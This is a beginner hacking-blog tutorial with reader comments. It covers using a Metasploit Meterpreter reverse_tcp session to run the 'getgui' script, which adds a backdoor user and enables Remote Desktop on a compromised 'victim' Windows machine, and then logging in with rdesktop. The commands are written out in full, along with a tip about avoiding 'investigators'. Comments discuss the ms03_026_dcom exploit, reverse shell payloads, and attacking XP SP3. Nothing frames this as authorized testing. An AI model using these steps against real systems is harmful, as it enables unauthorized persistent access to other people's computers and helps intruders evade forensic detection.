X

Sorry :(

Our Image server is on a maintenance now,
You will not see the image correctly
please check back shortly. . .

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Posted by v4L in Tutorial | 18 responses

Type : Tutorial

Level : Beginner, Medium

Last year when I'm teaching about computer security class, one student come and ask "can you give me simple tutorial how to use command prompt?", then I say "I don't think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue" from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it's the same…sometimes newly learned they just follow tutorials, but didn't know what exactly they doing.

Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you've already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirement :

1. Metasploit Framework

2. Backtrack 5(or another linux OS)

Step-By-Step :

1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

Enable Remote Desktop using Metasploit

to view the help.

3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service

run getgui -u valent -p r4h45i4

Enable Remote Desktop using Metasploit

Yep we already successfully created the user and activated the Remote Desktop Service.

Please note the last command "For cleanup use command : run multi_console_command….bla…bla….bla" it will be used after finish using the Remote Desktop Service of victim computer.

4. To connect to victim using remote desktop, we can use rdesktop program (it's already installed on backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>

Enable Remote Desktop using metasploit

initializing……and then….

Enable Remote Desktop using metasploit

5. You also should remember that when you add user it's mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators :-) . To clean up the user we've already created before(you can see on step 3).

Enable Remote Desktop using metasploit

Finish…

hope it's useful for you…any question?just drop on comment box. :-)

Vishnu Valentino

Computer Security, Blogger

Nothing Secure...

BANDUNG - INDONESIA

CHANGCHUN - CHINA


bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark
tabs-top

18 Comments »

  1. Hagai Says:

    Hi,
    I have a bigginers Q. :)
    where do I find the Meterpreter in BT5?

    comment-bottom
  2. v4L Says:

    #Hagai
    Firstly, you should exploited a machine first and then set payload using meterpreter. Please refer to this tutorial http://vishnuvalentino.com/computer/hacking-mozilla-firefox-3-5-to-3-6-nstreerange-vulnerability-using-metasploit/

    comment-bottom
  3. puppet Says:

    how do we know the username n password of the victim???
    n do we need to add new user to the victim compter?

    comment-bottom
  4. v4L Says:

    #puppet
    First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise target, you didn’t need to input any password or username :-)

    comment-bottom
  5. mehdi Says:

    i have a probleme Unknown command: rdesktop

    comment-bottom
  6. v4L Says:

    #mehdi
    Hmm….maybe you didn’t have rdesktop installed…try to run apt-get install rdesktop.

    comment-bottom
  8. th3bAdh Says:

    i have problem with rdesktop, password was invalid, but i've double check password, but still gettin error

    comment-bottom
  9. vir0e5 Says:

    Thx for info….
    Download RDesktop
    http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz

    comment-bottom
  10. v4L Says:

    #th3bAdh
    hmm…if the password was correct it should have no error like this…maybe the password was empty or issue with keyboard localization..

    comment-bottom
  11. josh Says:

    I am using following payload:
     (windows/shell/reverse_tcp):
    but wen i run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?
    Thanks!
     
     

    comment-bottom
  12. v4L Says:

    #josh
    maybe it’s mean that the target isn’t vulnerable.

    comment-bottom
  13. bagus Says:

    when i write getgui – h run , run the command it says unokwon ..
    What should I do ?

    comment-bottom
  14. v4L Says:

    #bagus
    did you already inside meterpreter console?

    comment-bottom
  15. DeusIgni Says:

    Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?
    -DeusIgni

    comment-bottom
  16. v4L Says:

    #Deuslgni
    Hmm maybe the target prevent you to create it…doesn’t mean that if you got meterpreater,you’ll also got the shell…it’s depend with the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..

    comment-bottom
  17. DeusIgni Says:

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

    comment-bottom

RSS feed for comments on this post. TrackBack URL

Leave a comment

CAPTCHA Image
*

Notify me of followup comments via e-mail. You can also subscribe without commenting.